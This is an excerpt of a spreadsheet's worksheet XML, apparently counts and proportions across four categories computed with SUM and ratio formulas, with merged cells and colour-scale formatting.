      <c r="K24" s="174"/>
      <c r="L24" s="174"/>
      <c r="M24" s="174"/>
      <c r="N24" s="174"/>
      <c r="O24" s="175" t="s">
        <v>1015</v>
      </c>
      <c r="Q24" s="174"/>
      <c r="R24" s="174"/>
      <c r="S24" s="174"/>
      <c r="T24" s="174"/>
      <c r="U24" s="174"/>
      <c r="V24" s="175" t="s">
        <v>1015</v>
      </c>
      <c r="AC24" s="175" t="s">
        <v>1015</v>
      </c>
    </row>
    <row r="25">
      <c r="C25" s="176"/>
      <c r="D25" s="176"/>
      <c r="E25" s="176"/>
      <c r="F25" s="176"/>
      <c r="G25" s="176"/>
      <c r="H25" s="176"/>
      <c r="I25" s="176"/>
      <c r="J25" s="176" t="s">
        <v>1029</v>
      </c>
      <c r="K25" s="177">
        <f t="shared" ref="K25:O25" si="14">SUM(K10:K22)</f>
        <v>8</v>
      </c>
      <c r="L25" s="177">
        <f t="shared" si="14"/>
        <v>14</v>
      </c>
      <c r="M25" s="177">
        <f t="shared" si="14"/>
        <v>19</v>
      </c>
      <c r="N25" s="177">
        <f t="shared" si="14"/>
        <v>23</v>
      </c>
      <c r="O25" s="165">
        <f t="shared" si="14"/>
        <v>79</v>
      </c>
      <c r="Q25" s="176" t="s">
        <v>1030</v>
      </c>
      <c r="R25" s="159">
        <f t="shared" ref="R25:V25" si="15">SUM(R10:R22)</f>
        <v>8</v>
      </c>
      <c r="S25" s="159">
        <f t="shared" si="15"/>
        <v>16</v>
      </c>
      <c r="T25" s="159">
        <f t="shared" si="15"/>
        <v>26</v>
      </c>
      <c r="U25" s="159">
        <f t="shared" si="15"/>
        <v>32</v>
      </c>
      <c r="V25" s="165">
        <f t="shared" si="15"/>
        <v>129</v>
      </c>
      <c r="X25" s="176" t="s">
        <v>1031</v>
      </c>
      <c r="Y25" s="178">
        <f t="shared" ref="Y25:AC25" si="16">SUM(Y10:Y22)</f>
        <v>127</v>
      </c>
      <c r="Z25" s="178">
        <f t="shared" si="16"/>
        <v>357</v>
      </c>
      <c r="AA25" s="178">
        <f t="shared" si="16"/>
        <v>431</v>
      </c>
      <c r="AB25" s="178">
        <f t="shared" si="16"/>
        <v>1054</v>
      </c>
      <c r="AC25" s="178">
        <f t="shared" si="16"/>
        <v>1054</v>
      </c>
    </row>
    <row r="26">
      <c r="C26" s="176"/>
      <c r="D26" s="176"/>
      <c r="E26" s="176"/>
      <c r="F26" s="176"/>
      <c r="G26" s="176"/>
      <c r="H26" s="176"/>
      <c r="I26" s="176"/>
      <c r="J26" s="176" t="s">
        <v>1032</v>
      </c>
      <c r="K26" s="174">
        <f t="shared" ref="K26:N26" si="17">$O$25-K25</f>
        <v>71</v>
      </c>
      <c r="L26" s="174">
        <f t="shared" si="17"/>
        <v>65</v>
      </c>
      <c r="M26" s="174">
        <f t="shared" si="17"/>
        <v>60</v>
      </c>
      <c r="N26" s="174">
        <f t="shared" si="17"/>
        <v>56</v>
      </c>
      <c r="Q26" s="176" t="s">
        <v>1033</v>
      </c>
      <c r="R26" s="179">
        <f t="shared" ref="R26:U26" si="18">$O$25-R25</f>
        <v>71</v>
      </c>
      <c r="S26" s="179">
        <f t="shared" si="18"/>
        <v>63</v>
      </c>
      <c r="T26" s="179">
        <f t="shared" si="18"/>
        <v>53</v>
      </c>
      <c r="U26" s="179">
        <f t="shared" si="18"/>
        <v>47</v>
      </c>
      <c r="V26" s="178"/>
      <c r="X26" s="176" t="s">
        <v>1034</v>
      </c>
      <c r="Y26" s="180">
        <f t="shared" ref="Y26:AB26" si="19">Y25/$AC$25</f>
        <v>0.1204933586</v>
      </c>
      <c r="Z26" s="180">
        <f t="shared" si="19"/>
        <v>0.3387096774</v>
      </c>
      <c r="AA26" s="180">
        <f t="shared" si="19"/>
        <v>0.4089184061</v>
      </c>
      <c r="AB26" s="180">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AC26" s="178"/>
    </row>
    <row r="27">
      <c r="C27" s="176"/>
      <c r="D27" s="176"/>
      <c r="E27" s="176"/>
      <c r="F27" s="176"/>
      <c r="G27" s="176"/>
      <c r="H27" s="176"/>
      <c r="I27" s="176"/>
      <c r="J27" s="176" t="s">
        <v>1035</v>
      </c>
      <c r="K27" s="181">
        <f t="shared" ref="K27:N27" si="20">K25/(K25+K26)</f>
        <v>0.1012658228</v>
      </c>
      <c r="L27" s="181">
        <f t="shared" si="20"/>
        <v>0.1772151899</v>
      </c>
      <c r="M27" s="181">
        <f t="shared" si="20"/>
        <v>0.2405063291</v>
      </c>
      <c r="N27" s="181">
        <f t="shared" si="20"/>
        <v>0.2911392405</v>
      </c>
      <c r="Q27" s="176" t="s">
        <v>1036</v>
      </c>
      <c r="R27" s="180">
        <f t="shared" ref="R27:U27" si="21">R25/(R25+R26)</f>
        <v>0.1012658228</v>
      </c>
      <c r="S27" s="180">
        <f t="shared" si="21"/>
        <v>0.2025316456</v>
      </c>
      <c r="T27" s="180">
        <f t="shared" si="21"/>
        <v>0.3291139241</v>
      </c>
      <c r="U27" s="180">
        <f t="shared" si="21"/>
        <v>0.4050632911</v>
      </c>
      <c r="V27" s="178"/>
      <c r="Y27" s="178"/>
      <c r="Z27" s="178"/>
      <c r="AA27" s="178"/>
      <c r="AB27" s="178"/>
      <c r="AC27" s="178"/>
    </row>
    <row r="28">
      <c r="C28" s="176"/>
      <c r="D28" s="176"/>
      <c r="E28" s="176"/>
      <c r="F28" s="176"/>
      <c r="G28" s="176"/>
      <c r="H28" s="176"/>
      <c r="I28" s="176"/>
      <c r="J28" s="176" t="s">
        <v>1037</v>
      </c>
      <c r="K28" s="181">
        <f t="shared" ref="K28:N28" si="22">1-K27</f>
        <v>0.8987341772</v>
      </c>
      <c r="L28" s="181">
        <f t="shared" si="22"/>
        <v>0.8227848101</v>
      </c>
      <c r="M28" s="181">
        <f t="shared" si="22"/>
        <v>0.7594936709</v>
      </c>
      <c r="N28" s="181">
        <f t="shared" si="22"/>
        <v>0.7088607595</v>
      </c>
      <c r="Q28" s="176" t="s">
        <v>1038</v>
      </c>
      <c r="R28" s="180">
        <f t="shared" ref="R28:U28" si="23">1-R27</f>
        <v>0.8987341772</v>
      </c>
      <c r="S28" s="180">
        <f t="shared" si="23"/>
        <v>0.7974683544</v>
      </c>
      <c r="T28" s="180">
        <f t="shared" si="23"/>
        <v>0.6708860759</v>
      </c>
      <c r="U28" s="180">
        <f t="shared" si="23"/>
        <v>0.5949367089</v>
      </c>
      <c r="V28" s="178"/>
    </row>
    <row r="29">
      <c r="R29" s="178"/>
      <c r="S29" s="178"/>
      <c r="T29" s="178"/>
      <c r="U29" s="178"/>
      <c r="V29" s="178"/>
    </row>
    <row r="30">
      <c r="X30" s="182" t="s">
        <v>1039</v>
      </c>
      <c r="Y30" s="109"/>
      <c r="Z30" s="109"/>
      <c r="AA30" s="109"/>
      <c r="AB30" s="109"/>
      <c r="AC30" s="110"/>
      <c r="AE30" s="182" t="s">
        <v>1040</v>
      </c>
      <c r="AF30" s="109"/>
      <c r="AG30" s="109"/>
      <c r="AH30" s="109"/>
      <c r="AI30" s="110"/>
    </row>
    <row r="31">
      <c r="X31" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="Y31" s="157" t="s">
        <v>4</v>
      </c>
      <c r="Z31" s="157" t="s">
        <v>5</v>
      </c>
      <c r="AA31" s="157" t="s">
        <v>6</v>
      </c>
      <c r="AB31" s="157" t="s">
        <v>7</v>
      </c>
      <c r="AC31" s="158" t="s">
        <v>1041</v>
      </c>
      <c r="AE31" s="156" t="s">
        <v>1025</v>
      </c>
      <c r="AF31" s="157" t="s">
        <v>4</v>
      </c>
      <c r="AG31" s="157" t="s">
        <v>5</v>
      </c>
      <c r="AH31" s="157" t="s">
        <v>6</v>
      </c>
      <c r="AI31" s="158" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="32">
      <c r="X32" s="164" t="s">
        <v>41</v>
      </c>
      <c r="Y32" s="165">
        <v>1.0</v>
      </c>
      <c r="Z32" s="165">
        <v>10.0</v>
      </c>
      <c r="AA32" s="165">
        <v>67.0</v>
      </c>
      <c r="AB32" s="165">
        <v>85.0</v>
      </c>
      <c r="AC32" s="166">
        <v>85.0</v>
      </c>
      <c r="AE32" s="164" t="s">
        <v>41</v>
      </c>
      <c r="AF32" s="183">
        <f t="shared" ref="AF32:AI32" si="24">Y32/Y10</f>
        <v>0.02173913043</v>
      </c>
      <c r="AG32" s="183">
        <f t="shared" si="24"/>
        <v>0.1369863014</v>
      </c>
      <c r="AH32" s="183">
        <f t="shared" si="24"/>
        <v>0.7701149425</v>
      </c>
      <c r="AI32" s="184">
        <f t="shared" si="24"/>
        <v>0.7142857143</v>
      </c>
    </row>
    <row r="33">
      <c r="X33" s="164" t="s">
        <v>107</v>
      </c>
      <c r="Y33" s="165">
        <v>0.0</v>
      </c>
      <c r="Z33" s="165">
        <v>0.0</v>
      </c>
      <c r="AA33" s="165">
        <v>0.0</v>
      </c>
      <c r="AB33" s="165">
        <v>0.0</v>
      </c>
      <c r="AC33" s="166">
        <v>0.0</v>
      </c>
      <c r="AE33" s="164" t="s">
        <v>107</v>
      </c>
      <c r="AF33" s="183">
        <f t="shared" ref="AF33:AI33" si="25">Y33/Y11</f>
        <v>0</v>
      </c>
      <c r="AG33" s="183">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="AH33" s="183">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="AI33" s="184">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="34">
      <c r="X34" s="164" t="s">
        <v>153</v>
      </c>
      <c r="Y34" s="165">
        <v>1.0</v>
      </c>
      <c r="Z34" s="165">
        <v>7.0</v>
      </c>
      <c r="AA34" s="165">
        <v>10.0</v>
      </c>
      <c r="AB34" s="165">
        <v>10.0</v>
      </c>
      <c r="AC34" s="166">
        <v>10.0</v>
      </c>
      <c r="AE34" s="164" t="s">
        <v>153</v>
      </c>
      <c r="AF34" s="183">
        <f t="shared" ref="AF34:AI34" si="26">Y34/Y12</f>
        <v>0.1666666667</v>
      </c>
      <c r="AG34" s="183">
        <f t="shared" si="26"/>
        <v>0.5384615385</v>
      </c>
      <c r="AH34" s="183">
        <f t="shared" si="26"/>
        <v>0.4761904762</v>
      </c>
      <c r="AI34" s="184">
        <f t="shared" si="26"/>
        <v>0.1694915254</v>
      </c>
    </row>
    <row r="35">
      <c r="X35" s="164" t="s">
        <v>154</v>
      </c>
      <c r="Y35" s="165">
        <v>0.0</v>
      </c>
      <c r="Z35" s="165">
        <v>2.0</v>
      </c>
      <c r="AA35" s="165">
        <v>7.0</v>
      </c>
      <c r="AB35" s="165">
        <v>7.0</v>
      </c>
      <c r="AC35" s="166">
        <v>7.0</v>
      </c>
      <c r="AE35" s="164" t="s">
        <v>154</v>
      </c>
      <c r="AF35" s="183">
        <f t="shared" ref="AF35:AI35" si="27">Y35/Y13</f>
        <v>0</v>
      </c>
      <c r="AG35" s="183">
        <f t="shared" si="27"/>
        <v>0.3333333333</v>
      </c>
      <c r="AH35" s="183">
        <f t="shared" si="27"/>
        <v>0.5</v>
      </c>
      <c r="AI35" s="184">
        <f t="shared" si="27"/>
        <v>0.1891891892</v>
      </c>
    </row>
    <row r="36">
      <c r="X36" s="164" t="s">
        <v>288</v>
      </c>
      <c r="Y36" s="165">
        <v>0.0</v>
      </c>
      <c r="Z36" s="165">
        <v>0.0</v>
      </c>
      <c r="AA36" s="165">
        <v>3.0</v>
      </c>
      <c r="AB36" s="165">
        <v>4.0</v>
      </c>
      <c r="AC36" s="166">
        <v>4.0</v>
      </c>
      <c r="AE36" s="164" t="s">
        <v>288</v>
      </c>
      <c r="AF36" s="183" t="s">
        <v>10</v>
      </c>
      <c r="AG36" s="183">
        <f t="shared" ref="AG36:AI36" si="28">Z36/Z14</f>
        <v>0</v>
      </c>
      <c r="AH36" s="183">
        <f t="shared" si="28"/>
        <v>0.3333333333</v>
      </c>
      <c r="AI36" s="184">
        <f t="shared" si="28"/>
        <v>0.09302325581</v>
      </c>
    </row>
    <row r="37">
      <c r="X37" s="164" t="s">
        <v>337</v>
      </c>
      <c r="Y37" s="165">
        <v>2.0</v>
      </c>
      <c r="Z37" s="165">
        <v>3.0</v>
      </c>
      <c r="AA37" s="165">
        <v>4.0</v>
      </c>
      <c r="AB37" s="165">
        <v>7.0</v>
      </c>
      <c r="AC37" s="166">
        <v>7.0</v>
      </c>
      <c r="AE37" s="164" t="s">
        <v>337</v>
      </c>
      <c r="AF37" s="183">
        <f t="shared" ref="AF37:AI37" si="29">Y37/Y15</f>
        <v>1</v>
      </c>
      <c r="AG37" s="183">
        <f t="shared" si="29"/>
        <v>0.4285714286</v>
      </c>
      <c r="AH37" s="183">
        <f t="shared" si="29"/>
        <v>0.4444444444</v>
      </c>
      <c r="AI37" s="184">
        <f t="shared" si="29"/>
        <v>0.1458333333</v>
      </c>
    </row>
    <row r="38">
      <c r="X38" s="164" t="s">
        <v>427</v>
      </c>
      <c r="Y38" s="165">
        <v>0.0</v>
      </c>
      <c r="Z38" s="165">
        <v>2.0</v>
      </c>
      <c r="AA38" s="165">
        <v>3.0</v>
      </c>
      <c r="AB38" s="165">
        <v>4.0</v>
      </c>
      <c r="AC38" s="166">
        <v>4.0</v>
      </c>
      <c r="AE38" s="164" t="s">
        <v>427</v>
      </c>
      <c r="AF38" s="183">
        <f t="shared" ref="AF38:AI38" si="30">Y38/Y16</f>
        <v>0</v>
      </c>
      <c r="AG38" s="183">
        <f t="shared" si="30"/>
        <v>0.1666666667</v>
      </c>
      <c r="AH38" s="183">
        <f t="shared" si="30"/>
        <v>0.2</v>
      </c>
      <c r="AI38" s="184">
        <f t="shared" si="30"/>
        <v>0.04819277108</v>
      </c>
    </row>
    <row r="39">
      <c r="X39" s="164" t="s">
        <v>215</v>
      </c>
      <c r="Y39" s="165">
        <v>0.0</v>
      </c>
      <c r="Z39" s="165">
        <v>3.0</v>
      </c>
      <c r="AA39" s="165">
        <v>4.0</v>
      </c>
      <c r="AB39" s="165">
        <v>5.0</v>
      </c>
      <c r="AC39" s="166">
        <v>5.0</v>
      </c>
      <c r="AE39" s="164" t="s">
        <v>215</v>
      </c>
      <c r="AF39" s="183">
        <f t="shared" ref="AF39:AI39" si="31">Y39/Y17</f>
        <v>0</v>
      </c>
      <c r="AG39" s="183">
        <f t="shared" si="31"/>
        <v>0.2</v>
      </c>
      <c r="AH39" s="183">
        <f t="shared" si="31"/>
        <v>0.2222222222</v>
      </c>
      <c r="AI39" s="184">
        <f t="shared" si="31"/>
        <v>0.07575757576</v>
      </c>
    </row>
    <row r="40">
      <c r="X40" s="164" t="s">
        <v>247</v>
      </c>
      <c r="Y40" s="165">
        <v>0.0</v>
      </c>
      <c r="Z40" s="165">
        <v>0.0</v>
      </c>
      <c r="AA40" s="165">
        <v>1.0</v>
      </c>
      <c r="AB40" s="165">
        <v>1.0</v>
      </c>
      <c r="AC40" s="166">
        <v>1.0</v>
      </c>
      <c r="AE40" s="164" t="s">
        <v>247</v>
      </c>
      <c r="AF40" s="183">
        <f t="shared" ref="AF40:AI40" si="32">Y40/Y18</f>
        <v>0</v>
      </c>
      <c r="AG40" s="183">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="AH40" s="183">
        <f t="shared" si="32"/>
        <v>0.125</v>
      </c>
      <c r="AI40" s="184">
        <f t="shared" si="32"/>
        <v>0.02631578947</v>
      </c>
    </row>
    <row r="41">
      <c r="X41" s="164" t="s">
        <v>756</v>
      </c>
      <c r="Y41" s="165">
        <v>2.0</v>
      </c>
      <c r="Z41" s="165">
        <v>6.0</v>
      </c>
      <c r="AA41" s="165">
        <v>13.0</v>
      </c>
      <c r="AB41" s="165">
        <v>13.0</v>
      </c>
      <c r="AC41" s="166">
        <v>13.0</v>
      </c>
      <c r="AE41" s="164" t="s">
        <v>756</v>
      </c>
      <c r="AF41" s="183">
        <f t="shared" ref="AF41:AI41" si="33">Y41/Y19</f>
        <v>1</v>
      </c>
      <c r="AG41" s="183">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="AH41" s="183">
        <f t="shared" si="33"/>
        <v>0.9285714286</v>
      </c>
      <c r="AI41" s="184">
        <f t="shared" si="33"/>
        <v>0.40625</v>
      </c>
    </row>
    <row r="42">
      <c r="X42" s="164" t="s">
        <v>321</v>
      </c>
      <c r="Y42" s="165">
        <v>1.0</v>
      </c>
      <c r="Z42" s="165">
        <v>3.0</v>
      </c>
      <c r="AA42" s="165">
        <v>13.0</v>
      </c>
      <c r="AB42" s="165">
        <v>15.0</v>
      </c>
      <c r="AC42" s="166">
        <v>15.0</v>
      </c>
      <c r="AE42" s="164" t="s">
        <v>321</v>
      </c>
      <c r="AF42" s="183">
        <f t="shared" ref="AF42:AI42" si="34">Y42/Y20</f>
        <v>0.1111111111</v>
      </c>
      <c r="AG42" s="183">
        <f t="shared" si="34"/>
        <v>0.02142857143</v>
      </c>
      <c r="AH42" s="183">
        <f t="shared" si="34"/>
        <v>0.08783783784</v>
      </c>
      <c r="AI42" s="184">
        <f t="shared" si="34"/>
        <v>0.03836317136</v>
      </c>
    </row>
    <row r="43">
      <c r="X43" s="164" t="s">
        <v>843</v>
      </c>
      <c r="Y43" s="165">
        <v>1.0</v>
      </c>
      <c r="Z43" s="165">
        <v>1.0</v>
      </c>
      <c r="AA43" s="165">
        <v>1.0</v>
      </c>
      <c r="AB43" s="165">
        <v>3.0</v>
      </c>
      <c r="AC43" s="166">
        <v>3.0</v>
      </c>
      <c r="AE43" s="164" t="s">
        <v>843</v>
      </c>
      <c r="AF43" s="183">
        <f t="shared" ref="AF43:AI43" si="35">Y43/Y21</f>
        <v>0.3333333333</v>
      </c>
      <c r="AG43" s="183">
        <f t="shared" si="35"/>
        <v>0.1</v>
      </c>
      <c r="AH43" s="183">
        <f t="shared" si="35"/>
        <v>0.07692307692</v>
      </c>
      <c r="AI43" s="184">
        <f t="shared" si="35"/>
        <v>0.08571428571</v>
      </c>
    </row>
    <row r="44">
      <c r="X44" s="169" t="s">
        <v>915</v>
      </c>
      <c r="Y44" s="170">
        <v>1.0</v>
      </c>
      <c r="Z44" s="170">
        <v>3.0</v>
      </c>
      <c r="AA44" s="170">
        <v>4.0</v>
      </c>
      <c r="AB44" s="170">
        <v>4.0</v>
      </c>
      <c r="AC44" s="171">
        <v>4.0</v>
      </c>
      <c r="AE44" s="169" t="s">
        <v>915</v>
      </c>
      <c r="AF44" s="185">
        <f t="shared" ref="AF44:AI44" si="36">Y44/Y22</f>
        <v>0.5</v>
      </c>
      <c r="AG44" s="185">
        <f t="shared" si="36"/>
        <v>0.5</v>
      </c>
      <c r="AH44" s="185">
        <f t="shared" si="36"/>
        <v>0.4</v>
      </c>
      <c r="AI44" s="186">
        <f t="shared" si="36"/>
        <v>0.1739130435</v>
      </c>
    </row>
    <row r="45">
      <c r="X45" s="154"/>
      <c r="Y45" s="154"/>
      <c r="Z45" s="154"/>
      <c r="AA45" s="154"/>
      <c r="AB45" s="154"/>
      <c r="AC45" s="154"/>
    </row>
    <row r="46">
      <c r="X46" s="154"/>
      <c r="Y46" s="154"/>
      <c r="Z46" s="154"/>
      <c r="AA46" s="154"/>
      <c r="AB46" s="154"/>
      <c r="AC46" s="154"/>
    </row>
    <row r="47">
      <c r="X47" s="176" t="s">
        <v>1041</v>
      </c>
      <c r="Y47" s="178">
        <f t="shared" ref="Y47:AC47" si="37">SUM(Y32:Y44)</f>
        <v>9</v>
      </c>
      <c r="Z47" s="178">
        <f t="shared" si="37"/>
        <v>40</v>
      </c>
      <c r="AA47" s="178">
        <f t="shared" si="37"/>
        <v>130</v>
      </c>
      <c r="AB47" s="178">
        <f t="shared" si="37"/>
        <v>158</v>
      </c>
      <c r="AC47" s="178">
        <f t="shared" si="37"/>
        <v>158</v>
      </c>
    </row>
    <row r="48">
      <c r="X48" s="176" t="s">
        <v>1042</v>
      </c>
      <c r="Y48" s="181">
        <f t="shared" ref="Y48:AB48" si="38">Y47/Y25</f>
        <v>0.07086614173</v>
      </c>
      <c r="Z48" s="181">
        <f t="shared" si="38"/>
        <v>0.1120448179</v>
      </c>
      <c r="AA48" s="181">
        <f t="shared" si="38"/>
        <v>0.3016241299</v>
      </c>
      <c r="AB48" s="181">
        <f t="shared" si="38"/>
        <v>0.1499051233</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="C8:F8"/>
    <mergeCell ref="J8:O8"/>
    <mergeCell ref="Q8:V8"/>
    <mergeCell ref="X8:AC8"/>
    <mergeCell ref="AE8:AI8"/>
    <mergeCell ref="X30:AC30"/>
    <mergeCell ref="AE30:AI30"/>
  </mergeCells>
  <conditionalFormatting sqref="AF10:AI22">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFE67C73"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF32:AI44">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="formula" val="0.5"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFABDDC5"/>
        <color rgb="FF57BB8A"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <drawing r:id="rId1"/>
</worksheet>
</file>